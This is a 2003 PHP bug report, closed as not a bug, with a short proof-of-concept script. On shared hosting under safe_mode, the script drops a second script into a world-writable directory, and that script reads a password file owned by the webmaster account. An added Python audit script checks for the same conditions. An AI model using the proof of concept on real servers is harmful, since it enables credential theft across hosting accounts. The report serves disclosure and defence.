ID:               25149
Updated by:       [EMAIL PROTECTED]
Reported By:      marrtins at hackers dot lv
-Status:          Open
+Status:          Bogus
Bug Type:         Scripting Engine problem
Operating System: Linux
PHP Version:      4.3.1
New Comment:

Thank you for taking the time to write to us, but this is not a bug.
Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report a bug
at http://bugs.php.net/how-to-report.php

This is how safe_mode works.


Previous Comments:
------------------------------------------------------------------------

[2003-08-19 11:15:33] marrtins at hackers dot lv

Description:
------------
apache_1.3.27

httpd.conf
----------
User webmaster
Group nobody

./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite

======================================
php-4.3.0

php.ini
---------
safe_mode = On

./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/

======================================

~/public_html> ls -al *
drwxr-xr-x    3 test     users        4096 aug 19 19:05 .
drwx--x--x    5 test     users        4096 aug 19 19:04 ..
-rw-r--r--    1 test     users         146 aug 19 18:47 hack.php
drwxrwxrwx    2 test     users        4096 aug 19 19:03 test

after accessing http://some_server/~test/hack.php php makes
test/stole.php

~/public_html> ls -al test
drwxrwxrwx    2 test     users        4096 aug 19 19:07 .
drwxr-xr-x    3 test     users        4096 aug 19 19:05 ..
-rw-r--r--    1 webmaste nobody         61 aug 19 19:07 stole.php

after that http://some_server/~test/test/stole.php locally reads
/www/secret/pass.inc.php owned by webmaster

Reproduce code:
---------------
<?
$data='<?
$data = file(\'/www/secret/pass.inc.php\');
print_r($data);
?>';
$f=fopen('/home/test/public_html/test/stole.php', 'w');
fwrite($f, $data);
fclose($f);
?>

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=25149&edit=1
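
Added example, not part of the original report or of PHP itself: a small audit for the two conditions visible in the listings above, a world-writable directory under the document root (public_html/test) and a PHP file owned by the web server account (stole.php, owner webmaster), which safe_mode's owner comparison treats like any other script owned by that account. The function name, the suffix list and the command-line usage are assumptions made for this sketch.

```python
import os
import pwd
import stat
import sys

# Assumed set of extensions the server hands to PHP; adjust to the local handler config.
PHP_SUFFIXES = (".php", ".php3", ".php4", ".phtml", ".inc")


def audit_docroot(root, server_uid):
    """Return (world_writable_dirs, server_owned_scripts) found under root.

    world_writable_dirs: directories where any local account, including PHP
    running as the server, can create files.
    server_owned_scripts: PHP files whose owner is the server account, i.e.
    files that were most likely created by PHP rather than uploaded by a user.
    """
    writable_dirs, server_scripts = [], []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            writable_dirs.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks out of the tree
            except OSError:
                continue  # file vanished between listing and stat
            if not stat.S_ISREG(st.st_mode):
                continue
            if name.lower().endswith(PHP_SUFFIXES) and st.st_uid == server_uid:
                server_scripts.append(path)
    return sorted(writable_dirs), sorted(server_scripts)


if __name__ == "__main__":
    # Usage: audit.py <docroot> <server account>, e.g. the "User" value from httpd.conf
    root, account = sys.argv[1], sys.argv[2]
    dirs, scripts = audit_docroot(root, pwd.getpwnam(account).pw_uid)
    for d in dirs:
        print("world-writable directory:", d)
    for s in scripts:
        print("script owned by server account:", s)
```
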
